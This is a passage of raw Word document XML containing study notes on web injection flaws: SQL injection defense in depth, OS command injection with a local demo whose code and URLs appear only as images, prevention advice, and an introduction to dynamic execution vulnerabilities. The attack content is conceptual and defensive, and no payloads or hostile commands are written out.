        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED612D">
        <w:t>Not as SQL code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4C5E80" w14:textId="77777777" w:rsidR="00ED612D" w:rsidRDefault="00ED612D" w:rsidP="00ED612D"/>
    <w:p w14:paraId="22202317" w14:textId="05BB1EA8" w:rsidR="00ED612D" w:rsidRPr="00533F6B" w:rsidRDefault="00533F6B" w:rsidP="00ED612D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533F6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Defense in Depth</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7274B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A717EAC" w14:textId="2C06C798" w:rsidR="00533F6B" w:rsidRPr="00533F6B" w:rsidRDefault="00533F6B" w:rsidP="00533F6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533F6B">
        <w:t>Defense in Depth means using multiple security layers, not just one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F154FFE" w14:textId="33029702" w:rsidR="00533F6B" w:rsidRPr="00533F6B" w:rsidRDefault="00533F6B" w:rsidP="00533F6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533F6B">
        <w:t>Give applications only minimal database permissions to limit damage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAAB65D" w14:textId="5F949951" w:rsidR="00533F6B" w:rsidRPr="00533F6B" w:rsidRDefault="00533F6B" w:rsidP="00533F6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533F6B">
        <w:t>Disable unused database features so attackers can’t abuse them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6322E79F" w14:textId="11FDDCDA" w:rsidR="00533F6B" w:rsidRPr="00533F6B" w:rsidRDefault="00533F6B" w:rsidP="00533F6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533F6B">
        <w:t>Apply security patches quickly to fix known database vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EFFA85" w14:textId="69C2CB77" w:rsidR="003B7CFB" w:rsidRPr="00A56427" w:rsidRDefault="003770C2" w:rsidP="003B7CFB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003770C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Injecting OS Commands</w:t>
      </w:r>
      <w:r w:rsidR="003B7CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B1712" w14:textId="4228A70E" w:rsidR="00CC32EF" w:rsidRPr="00CC32EF" w:rsidRDefault="00CC32EF" w:rsidP="00CC32EF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC32EF">
        <w:t>Command injection means: An attacker tricks the application into running extra or different OS commands than the developer intended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758AAF26" w14:textId="71759829" w:rsidR="008762D3" w:rsidRPr="008762D3" w:rsidRDefault="008762D3" w:rsidP="008762D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008762D3">
        <w:t>Web applications can run OS commands, but doing so directly is risky.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E2922" w14:textId="5AF35522" w:rsidR="008762D3" w:rsidRPr="008762D3" w:rsidRDefault="008762D3" w:rsidP="008762D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008762D3">
        <w:t>If user input is included in OS commands, attackers can inject malicious commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712CDF94" w14:textId="3B716E15" w:rsidR="008762D3" w:rsidRPr="008762D3" w:rsidRDefault="008762D3" w:rsidP="008762D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008762D3">
        <w:t>Injected commands run with web server privileges, often allowing full server takeover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFC4AE" w14:textId="1EC06E51" w:rsidR="00CC32EF" w:rsidRDefault="008762D3" w:rsidP="003B7CFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008762D3">
        <w:t>This vulnerability is common in admin and device-management applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592FA01" w14:textId="3FAB49FD" w:rsidR="00F07980" w:rsidRPr="00F07980" w:rsidRDefault="00F07980" w:rsidP="00F07980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07980">
        <w:t>Command injection testing requires checking all user inputs, including URLs, forms, and cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728DAEFC" w14:textId="7DC07064" w:rsidR="00F07980" w:rsidRPr="00F07980" w:rsidRDefault="00F07980" w:rsidP="00F07980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07980">
        <w:t>Attackers use shell metacharacters to add or alter OS commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407EE359" w14:textId="5DEBDEE6" w:rsidR="00F07980" w:rsidRPr="00F07980" w:rsidRDefault="00F07980" w:rsidP="00F07980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07980">
        <w:t>Different systems handle commands differently, so assumptions should not be made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE49317" w14:textId="258CE8FC" w:rsidR="00F07980" w:rsidRPr="00F07980" w:rsidRDefault="00F07980" w:rsidP="00F07980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07980">
        <w:t>Time-delay testing is the most reliable way to detect hidden command injection flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1EC1BA" w14:textId="77777777" w:rsidR="00DA0035" w:rsidRDefault="00DA0035" w:rsidP="00DA0035"/>
    <w:p w14:paraId="04C04662" w14:textId="0C3D7B66" w:rsidR="00DA0035" w:rsidRDefault="00DA0035" w:rsidP="00DA0035">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Observing OS command injection on a local website</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7274B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295170E" w14:textId="444DC6A2" w:rsidR="00DA0035" w:rsidRDefault="00B65A29" w:rsidP="00DA0035">
      <w:r>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F43BDC0" w14:textId="7B3EAB45" w:rsidR="00B65A29" w:rsidRDefault="005F6D0E" w:rsidP="00DA0035">
      <w:r w:rsidRPr="005F6D0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E3D6915" wp14:editId="7755F6B7">
            <wp:extent cx="5731510" cy="3217545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="206050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06443" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3217545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4AE9B4" w14:textId="399FC770" w:rsidR="005F6D0E" w:rsidRDefault="005F6D0E" w:rsidP="00DA0035">
      <w:r>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9AC72" w14:textId="1FEBEEE0" w:rsidR="005F6D0E" w:rsidRDefault="005F6D0E" w:rsidP="005F6D0E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005F6D0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3937C7E4" wp14:editId="29A316AB">
            <wp:extent cx="2899217" cy="1634836"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="178439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91445" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2918716" cy="1645831"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28C8F7" w14:textId="473FEFDB" w:rsidR="00A63935" w:rsidRDefault="00980942" w:rsidP="00A63935">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Change the web address to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35597C25" w14:textId="5B6EBE9E" w:rsidR="00980942" w:rsidRDefault="00980942" w:rsidP="00980942">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00980942">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42939614" wp14:editId="374D192E">
            <wp:extent cx="5731510" cy="2527935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="98803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1592" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2527935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E384789" w14:textId="1134EE0C" w:rsidR="00D016D2" w:rsidRDefault="00D016D2" w:rsidP="00D016D2">
      <w:r>
        <w:t>Clearly, allowed the OS injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E6C179" w14:textId="77777777" w:rsidR="00780F3E" w:rsidRDefault="00780F3E" w:rsidP="00D016D2"/>
    <w:p w14:paraId="5A8BD11D" w14:textId="42DD554B" w:rsidR="00780F3E" w:rsidRDefault="00780F3E" w:rsidP="00780F3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00780F3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Preventing OS Command Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7274B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8648BE" w14:textId="002341AE" w:rsidR="008D407D" w:rsidRPr="008D407D" w:rsidRDefault="008D407D" w:rsidP="008D407D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D407D">
        <w:t>The best defense is to avoid OS commands and use built</w:t>
      </w:r>
      <w:r w:rsidRPr="008D407D">
        <w:noBreakHyphen/>
        <w:t>in APIs instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1771D" w14:textId="7F5E7085" w:rsidR="008D407D" w:rsidRPr="008D407D" w:rsidRDefault="008D407D" w:rsidP="008D407D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D407D">
        <w:t>If OS commands are required, user input must be strictly allow</w:t>
      </w:r>
      <w:r w:rsidRPr="008D407D">
        <w:noBreakHyphen/>
        <w:t>listed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2263886D" w14:textId="301DFACB" w:rsidR="008D407D" w:rsidRPr="008D407D" w:rsidRDefault="008D407D" w:rsidP="008D407D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D407D">
        <w:t>Only very limited character sets should be accepted; special characters must be rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F757EDC" w14:textId="180C49E3" w:rsidR="008D407D" w:rsidRPr="008D407D" w:rsidRDefault="008D407D" w:rsidP="008D407D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008D407D">
        <w:t>Use safe command execution APIs that do not support shell interpretation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B6A95A" w14:textId="77777777" w:rsidR="00780F3E" w:rsidRDefault="00780F3E" w:rsidP="00D016D2"/>
    <w:p w14:paraId="3497FB80" w14:textId="45957171" w:rsidR="004075BB" w:rsidRPr="00A56427" w:rsidRDefault="004075BB" w:rsidP="004075BB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004075BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injecting into Web Scripting Languages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179EF2E8" w14:textId="495E2F74" w:rsidR="008E5C1C" w:rsidRPr="008E5C1C" w:rsidRDefault="008E5C1C" w:rsidP="008E5C1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5C1C">
        <w:t>Websites run code to work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D97C82" w14:textId="0EFEC852" w:rsidR="008E5C1C" w:rsidRPr="008E5C1C" w:rsidRDefault="008E5C1C" w:rsidP="008E5C1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5C1C">
        <w:t>If they trust user input too much</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A52FA" w14:textId="1704215E" w:rsidR="008E5C1C" w:rsidRPr="008E5C1C" w:rsidRDefault="008E5C1C" w:rsidP="008E5C1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5C1C">
        <w:t>Attackers can inject bad code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E3329" w14:textId="697C43A8" w:rsidR="008E5C1C" w:rsidRPr="008E5C1C" w:rsidRDefault="008E5C1C" w:rsidP="008E5C1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5C1C">
        <w:t>This happens mainly when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D8CED" w14:textId="77777777" w:rsidR="008E5C1C" w:rsidRPr="008E5C1C" w:rsidRDefault="008E5C1C" w:rsidP="008E5C1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5C1C">
        <w:t>User input is executed as code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4428E" w14:textId="77777777" w:rsidR="008E5C1C" w:rsidRPr="008E5C1C" w:rsidRDefault="008E5C1C" w:rsidP="008E5C1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5C1C">
        <w:t>User input decides which code file is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11920FED" w14:textId="77777777" w:rsidR="00EC09FC" w:rsidRDefault="00EC09FC" w:rsidP="004075BB"/>
    <w:p w14:paraId="76101562" w14:textId="76620DBF" w:rsidR="00EC09FC" w:rsidRPr="00EC09FC" w:rsidRDefault="00EC09FC" w:rsidP="004075BB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC09FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Dynamic Execution Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF89A4" w14:textId="604A1064" w:rsidR="00EC09FC" w:rsidRDefault="004F20ED" w:rsidP="004075BB">
      <w:r w:rsidRPr="004F20ED">
        <w:t>What is “Dynamic Execution”?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFA5597" w14:textId="77777777" w:rsidR="004F20ED" w:rsidRPr="004F20ED" w:rsidRDefault="004F20ED" w:rsidP="004F20ED">
      <w:r w:rsidRPr="004F20ED">
        <w:t>Dynamic execution means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF33524" w14:textId="77777777" w:rsidR="004F20ED" w:rsidRPr="004F20ED" w:rsidRDefault="004F20ED" w:rsidP="004F20ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F20ED">
        <w:t>A website creates code while it is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63552E0D" w14:textId="7284ABF4" w:rsidR="004F20ED" w:rsidRDefault="004F20ED" w:rsidP="004075BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F20ED">
        <w:t>Then runs that code immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F61F43" w14:textId="77777777" w:rsidR="002B0F18" w:rsidRPr="002B0F18" w:rsidRDefault="002B0F18" w:rsidP="002B0F18">
      <w:r w:rsidRPr="002B0F18">
        <w:t>This can be useful — but it’s dangerous if user input is involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD360A" w14:textId="77777777" w:rsidR="00C420C1" w:rsidRDefault="00C420C1" w:rsidP="00C420C1"/>
    <w:p w14:paraId="2E0195AE" w14:textId="106B9FC6" w:rsidR="00C420C1" w:rsidRPr="00C420C1" w:rsidRDefault="00C420C1" w:rsidP="00C420C1">
      <w:r w:rsidRPr="00C420C1">
        <w:lastRenderedPageBreak/>
        <w:t>Why is it dangerous?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7F58D" w14:textId="77777777" w:rsidR="00C420C1" w:rsidRPr="00C420C1" w:rsidRDefault="00C420C1" w:rsidP="00C420C1">
      <w:r w:rsidRPr="00C420C1">
        <w:t>If user input is included in dynamically executed code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F3E4AF" w14:textId="77777777" w:rsidR="00C420C1" w:rsidRPr="00C420C1" w:rsidRDefault="00C420C1" w:rsidP="00C420C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C420C1">
        <w:t>The website expects safe data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798EBD6" w14:textId="77777777" w:rsidR="00C420C1" w:rsidRPr="00C420C1" w:rsidRDefault="00C420C1" w:rsidP="00C420C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C420C1">
        <w:t>An attacker sends malicious commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C378C" w14:textId="77777777" w:rsidR="00C420C1" w:rsidRPr="00C420C1" w:rsidRDefault="00C420C1" w:rsidP="00C420C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C420C1">
        <w:t>The server runs the attacker’s commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD2124E" w14:textId="1D27F769" w:rsidR="00096962" w:rsidRDefault="00096962" w:rsidP="004075BB">
      <w:r>
        <w:t>Basically,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0380394C" w14:textId="77777777" w:rsidR="00096962" w:rsidRPr="00096962" w:rsidRDefault="00096962" w:rsidP="00096962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00096962">
        <w:t>Some websites run code built from user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922DB5E" w14:textId="77777777" w:rsidR="00096962" w:rsidRPr="00096962" w:rsidRDefault="00096962" w:rsidP="00096962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00096962">
        <w:t>Attackers send fake input that contains commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79469F47" w14:textId="77777777" w:rsidR="00096962" w:rsidRPr="00096962" w:rsidRDefault="00096962" w:rsidP="00096962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00096962">
        <w:t>The server runs attacker commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255969D8" w14:textId="77777777" w:rsidR="00096962" w:rsidRPr="00096962" w:rsidRDefault="00096962" w:rsidP="00096962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00096962">
        <w:t>This can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723E5177" w14:textId="77777777" w:rsidR="00096962" w:rsidRPr="00096962" w:rsidRDefault="00096962" w:rsidP="00096962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00096962">
        <w:t>Read system files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC845CE" w14:textId="77777777" w:rsidR="00096962" w:rsidRPr="00096962" w:rsidRDefault="00096962" w:rsidP="00096962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00096962">
        <w:t>Run OS commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AC82E" w14:textId="77777777" w:rsidR="00096962" w:rsidRPr="00096962" w:rsidRDefault="00096962" w:rsidP="00096962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00096962">
        <w:t>Fully compromise the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF081ED" w14:textId="77777777" w:rsidR="00096962" w:rsidRDefault="00096962" w:rsidP="004075BB"/>
    <w:p w14:paraId="5B9289DA" w14:textId="77777777" w:rsidR="005C606A" w:rsidRDefault="00E33E3F" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33E3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0201E7F7" w14:textId="2BAB095A" w:rsidR="00E33E3F" w:rsidRPr="005C606A" w:rsidRDefault="00E33E3F" w:rsidP="005C606A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E33E3F">
        <w:t xml:space="preserve">Dynamic execution vulnerabilities happen when a website runs user input as code, allowing </w:t>
      </w:r>
      <w:r w:rsidRPr="005C606A">
        <w:t>attackers to inject and execute their own commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D988E0E" w14:textId="77777777" w:rsidR="005C606A" w:rsidRPr="005C606A" w:rsidRDefault="005C606A" w:rsidP="005C606A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005C606A">
